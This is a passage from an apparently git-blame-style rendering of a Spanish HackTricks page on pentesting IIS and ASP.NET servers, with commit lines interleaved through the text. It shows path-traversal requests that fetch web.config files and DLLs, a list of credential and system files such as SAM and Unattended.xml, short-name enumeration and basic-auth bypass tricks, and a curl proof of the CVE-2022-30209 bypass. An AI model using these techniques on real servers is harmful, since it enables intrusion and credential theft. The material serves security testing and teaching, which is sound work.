 								</dependentAssembly>
 								<dependentAssembly>
 								<assemblyIdentity name="Newtonsoft.Json" culture="neutral" />
 								<bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
 								</dependentAssembly>
 								<dependentAssembly>
 								<assemblyIdentity name="System.Web.Optimization" />
 								<bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="1.1.0.0" />
 								</dependentAssembly>
 								<dependentAssembly>
 								<assemblyIdentity name="WebGrease" />
 								<bindingRedirect oldVersion="0.0.0.0-1.5.2.14234" newVersion="1.5.2.14234" />
 								</dependentAssembly>
 								<dependentAssembly>
 								<assemblyIdentity name="System.Web.Helpers" />
 								<bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" />
 								</dependentAssembly>
 								<dependentAssembly>
 								<assemblyIdentity name="System.Web.Mvc" />
 								<bindingRedirect oldVersion="1.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
 								</dependentAssembly>
 								<dependentAssembly>
 								<assemblyIdentity name="System.Web.WebPages" />
 								<bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" />
 								</dependentAssembly>
 								</assemblyBinding>
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								```
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								En la salida anterior puedes encontrar referencias a varios "**assemblyIdentity**". Estos son archivos que pueden estar ubicados dentro de la carpeta /bin. Por ejemplo: **/bin/WebGrease.dll.**
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								Otros archivos que podrían encontrarse en el directorio raíz de una aplicación .Net son **/global.asax**
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								```markup
 								<%@ Application Codebehind="Global.asax.cs" Inherits="WebApplication1.MvcApplication" Language="C#" %>
 								```
 								Y **/connectionstrings.config**
-												Translated ['1911-pentesting-fox.md', 'README.md', 'ctf-write-ups/try-ha

											
										
										
											2023-06-07 04:36:55 +00:00
+								**Nota: ¡este archivo contiene contraseñas!**
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								```markup
 								<connectionStrings>
-												Translated ['network-services-pentesting/pentesting-web/iis-internet-inf

											
										
										
											2023-07-11 14:01:07 +00:00
+								<add name="DefaultConnection" connectionString="Data Source=(LocalDb)\MSSQLLocalDB;AttachDbFilename [...]" providerName="System.Data.SqlClient" />
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								</connectionStrings>
 								```
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								**Namespaces**
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								Además, las aplicaciones .Net MVC están estructuradas para definir **otros archivos web.config**, con el objetivo de incluir cualquier declaración para espacios de nombres específicos para cada conjunto de viewpages, liberando a los desarrolladores de declarar espacios de nombres "@using" en cada archivo.
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								```markup
 								GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
 								Host: example-mvc-application.minded
 								[...]
 								HTTP/1.1 200 OK
 								[...]
 								<?xml version="1.0"?>
 								<configuration>
-												Translated ['network-services-pentesting/pentesting-web/iis-internet-inf

											
										
										
											2023-07-11 14:01:07 +00:00
+								<configSections>
 								<sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral">
 								<section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
 								<section name="pages" type="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
 								</sectionGroup>
 								</configSections>
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								<system.web.webPages.razor><host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" /><pages pageBaseType="System.Web.Mvc.WebViewPage">
-												Translated ['network-services-pentesting/pentesting-web/iis-internet-inf

											
										
										
											2023-07-11 14:01:07 +00:00
+								<namespaces>
 								<add namespace="System.Web.Mvc" />
 								<add namespace="System.Web.Mvc.Ajax" />
 								<add namespace="System.Web.Mvc.Html" />
 								<add namespace="System.Web.Optimization"/>
 								<add namespace="System.Web.Routing" />
 								<add namespace="WebApplication1" />
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								```
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								**Descarga de DLLs**
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								Desde una respuesta anterior, la declaración de un **espacio de nombres personalizado** (ya que otros espacios de nombres son predeterminados) sugiere que una DLL llamada "**WebApplication1**" está presente en el directorio /bin.
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								```
 								GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
 								Host: example-mvc-application.minded
 								[...]
 								```
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								Del resultado anterior, dentro del directorio /bin también podrás encontrar las Dlls
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
 								* System.Web.Mvc.dll
 								* System.Web.Mvc.Ajax.dll
 								* System.Web.Mvc.Html.dll
 								* System.Web.Optimization.dll
 								* System.Web.Routing.dll
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								Supongamos que la DLL anterior está importando un espacio de nombres llamado **WebApplication1.Areas.Minded.** un atacante puede inferir que otros archivos web.config están presentes en la aplicación, en rutas adivinables/por defecto como **/area-name/Views/**, que contienen configuraciones específicas que pueden referirse a otros archivos DLL presentes en la carpeta /bin.
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								```markup
 								GET /download_page?id=..%2f..%2fMinded/Views/web.config HTTP/1.1
 								Host: example-mvc-application.minded
 								[...]
 								HTTP/1.1 200 OK
 								[...]
 								<?xml version="1.0"?>
 								<configuration>
 								<configSections>
-												Translated ['network-services-pentesting/pentesting-web/iis-internet-inf

											
										
										
											2023-07-11 14:01:07 +00:00
+								<sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral">
 								<section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
 								<section name="pages" type="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral” requirePermission="false" />
 								</sectionGroup>
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								</configSections>
 								<system.web.webPages.razor><host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" />
 								<pages pageBaseType="System.Web.Mvc.WebViewPage">
 								<namespaces>
-												Translated ['network-services-pentesting/pentesting-web/iis-internet-inf

											
										
										
											2023-07-11 14:01:07 +00:00
+								<add namespace="System.Web.Mvc" />
 								<add namespace="System.Web.Mvc.Ajax" />
 								<add namespace="System.Web.Mvc.Html" />
 								<add namespace="System.Web.Routing" />
 								<add namespace="System.Web.Optimization" />
 								<add namespace="WebApplication1" />
 								<add namespace="WebApplication1.AdditionalFeatures" />
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								</namespaces>
 								```
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								Tenga en cuenta cómo en la salida anterior puede ver un nuevo espacio de nombres llamado: **WebApplication1.AdditionalFeatures** lo que indica que hay otro Dll en la carpeta /bin llamado **WebApplication1.AdditionalFeatures.dll**
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
 								### Archivos comunes
 								Desde [aquí](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
 								```
 								C:\Apache\conf\httpd.conf
 								C:\Apache\logs\access.log
 								C:\Apache\logs\error.log
 								C:\Apache2\conf\httpd.conf
 								C:\Apache2\logs\access.log
 								C:\Apache2\logs\error.log
 								C:\Apache22\conf\httpd.conf
 								C:\Apache22\logs\access.log
 								C:\Apache22\logs\error.log
 								C:\Apache24\conf\httpd.conf
 								C:\Apache24\logs\access.log
 								C:\Apache24\logs\error.log
 								C:\Documents and Settings\Administrator\NTUser.dat
 								C:\php\php.ini
 								C:\php4\php.ini
 								C:\php5\php.ini
 								C:\php7\php.ini
 								C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
 								C:\Program Files (x86)\Apache Group\Apache\logs\access.log
 								C:\Program Files (x86)\Apache Group\Apache\logs\error.log
 								C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
 								C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
 								C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
 								c:\Program Files (x86)\php\php.ini"
 								C:\Program Files\Apache Group\Apache\conf\httpd.conf
 								C:\Program Files\Apache Group\Apache\conf\logs\access.log
 								C:\Program Files\Apache Group\Apache\conf\logs\error.log
 								C:\Program Files\Apache Group\Apache2\conf\httpd.conf
 								C:\Program Files\Apache Group\Apache2\conf\logs\access.log
 								C:\Program Files\Apache Group\Apache2\conf\logs\error.log
 								C:\Program Files\FileZilla Server\FileZilla Server.xml
 								C:\Program Files\MySQL\my.cnf
 								C:\Program Files\MySQL\my.ini
 								C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
 								C:\Program Files\MySQL\MySQL Server 5.0\my.ini
 								C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
 								C:\Program Files\MySQL\MySQL Server 5.1\my.ini
 								C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
 								C:\Program Files\MySQL\MySQL Server 5.5\my.ini
 								C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
 								C:\Program Files\MySQL\MySQL Server 5.6\my.ini
 								C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
 								C:\Program Files\MySQL\MySQL Server 5.7\my.ini
 								C:\Program Files\php\php.ini
 								C:\Users\Administrator\NTUser.dat
 								C:\Windows\debug\NetSetup.LOG
 								C:\Windows\Panther\Unattend\Unattended.xml
 								C:\Windows\Panther\Unattended.xml
 								C:\Windows\php.ini
 								C:\Windows\repair\SAM
 								C:\Windows\repair\system
 								C:\Windows\System32\config\AppEvent.evt
 								C:\Windows\System32\config\RegBack\SAM
 								C:\Windows\System32\config\RegBack\system
 								C:\Windows\System32\config\SAM
 								C:\Windows\System32\config\SecEvent.evt
 								C:\Windows\System32\config\SysEvent.evt
 								C:\Windows\System32\config\SYSTEM
 								C:\Windows\System32\drivers\etc\hosts
 								C:\Windows\System32\winevt\Logs\Application.evtx
 								C:\Windows\System32\winevt\Logs\Security.evtx
 								C:\Windows\System32\winevt\Logs\System.evtx
-												Translated ['network-services-pentesting/pentesting-web/iis-internet-inf

											
										
										
											2023-07-11 14:01:07 +00:00
+								C:\Windows\win.ini
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								C:\xampp\apache\conf\extra\httpd-xampp.conf
 								C:\xampp\apache\conf\httpd.conf
 								C:\xampp\apache\logs\access.log
 								C:\xampp\apache\logs\error.log
 								C:\xampp\FileZillaFTP\FileZilla Server.xml
 								C:\xampp\MercuryMail\MERCURY.INI
 								C:\xampp\mysql\bin\my.ini
 								C:\xampp\php\php.ini
 								C:\xampp\security\webdav.htpasswd
 								C:\xampp\sendmail\sendmail.ini
 								C:\xampp\tomcat\conf\server.xml
 								```
 								## Error 404 de HTTPAPI 2.0
 								Si ves un error como el siguiente:
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png>)
 								Significa que el servidor **no recibió el nombre de dominio correcto** dentro del encabezado Host.\
 								Para acceder a la página web podrías revisar el **Certificado SSL** proporcionado y quizás puedas encontrar el nombre del dominio/subdominio allí. Si no está allí, puede que necesites **fuerza bruta en VHosts** hasta encontrar el correcto.
 								## Vulnerabilidades antiguas de IIS que vale la pena buscar
 								### Vulnerabilidad/Característica del carácter tilde “\~” de Microsoft IIS – Divulgación de Nombre de Archivo/Carpeta Corto
 								Puedes intentar **enumerar carpetas y archivos** dentro de cada carpeta descubierta (incluso si requiere Autenticación Básica) utilizando esta **técnica**.\
 								La principal limitación de esta técnica si el servidor es vulnerable es que **solo puede encontrar hasta las primeras 6 letras del nombre de cada archivo/carpeta y las primeras 3 letras de la extensión** de los archivos.
 								Puedes usar [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) para probar esta vulnerabilidad:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
 								![](<../../.gitbook/assets/image (183).png>)
 								Investigación original: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf)
 								También puedes usar **metasploit**: `use scanner/http/iis_shortname_scanner`
 								### Omisión de Autenticación Básica
 								**Omitir** una autenticación básica (**IIS 7.5**) intentando acceder a: `/admin:$i30:$INDEX_ALLOCATION/admin.php` o `/admin::$INDEX_ALLOCATION/admin.php`
 								Puedes intentar **combinar** esta **vulnerabilidad** y la última para encontrar nuevas **carpetas** y **omitir** la autenticación.
 								## Depuración habilitada de ASP.NET Trace.AXD
 								ASP.NET incluye un modo de depuración y su archivo se llama `trace.axd`.
 								Mantiene un registro muy detallado de todas las solicitudes realizadas a una aplicación durante un período de tiempo.
 								Esta información incluye IP's de clientes remotos, ID de sesiones, todas las cookies de solicitud y respuesta, rutas físicas, información del código fuente y potencialmente incluso nombres de usuario y contraseñas.
 								[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/)
 								![Screenshot 2021-03-30 at 13 19 11](https://user-images.githubusercontent.com/31736688/112974448-2690b000-915b-11eb-896c-f41c27c44286.png)
 								## Cookie ASPXAUTH
 								ASPXAUTH utiliza la siguiente información:
 								* **`validationKey`** (cadena): clave codificada en hexadecimal para usar en la validación de la firma.
 								* **`decryptionMethod`** (cadena): (por defecto “AES”).
 								* **`decryptionIV`** (cadena): vector de inicialización codificado en hexadecimal (por defecto un vector de ceros).
 								* **`decryptionKey`** (cadena): clave codificada en hexadecimal para usar en el descifrado.
 								Sin embargo, algunas personas usarán los **valores predeterminados** de estos parámetros y usarán como **cookie el correo electrónico del usuario**. Por lo tanto, si puedes encontrar una web que use la **misma plataforma** que está utilizando la cookie ASPXAUTH y **creas un usuario con el correo electrónico del usuario que quieres suplantar** en el servidor bajo ataque, podrías ser capaz de **usar la cookie del segundo servidor en el primero** y suplantar al usuario.\
 								Este ataque funcionó en este [**informe**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).
 								## Omisión de Autenticación en IIS con contraseñas en caché (CVE-2022-30209) <a href="#3-iis-authentication-bypass" id="3-iis-authentication-bypass"></a>
 								Un error en el código **no verificaba correctamente la contraseña proporcionada por el usuario**, por lo que un atacante cuyo **hash de contraseña coincida con una clave** que ya está en la **caché** podrá iniciar sesión como ese usuario ([informe completo aquí](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html)).
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								```python
 								# script for sanity check
 								> type test.py
 								def HashString(password):
-												Translated ['network-services-pentesting/pentesting-web/iis-internet-inf

											
										
										
											2023-07-11 14:01:07 +00:00
+								j = 0
 								for c in map(ord, password):
 								j = c + (101*j)&0xffffffff
 								return j
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
 								assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT')
 								# before the successful login
 								> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
 								HTTP/1.1 401 Unauthorized
 								# after the successful login
 								> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
 								HTTP/1.1 200 OK
 								```
 								<details>
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
 								Otras formas de apoyar a HackTricks:
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								* Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** revisa los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
 								* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
 								* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
 								* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sigue** a **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
 								* **Comparte tus trucos de hacking enviando PRs a los repositorios de github de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
 								</details>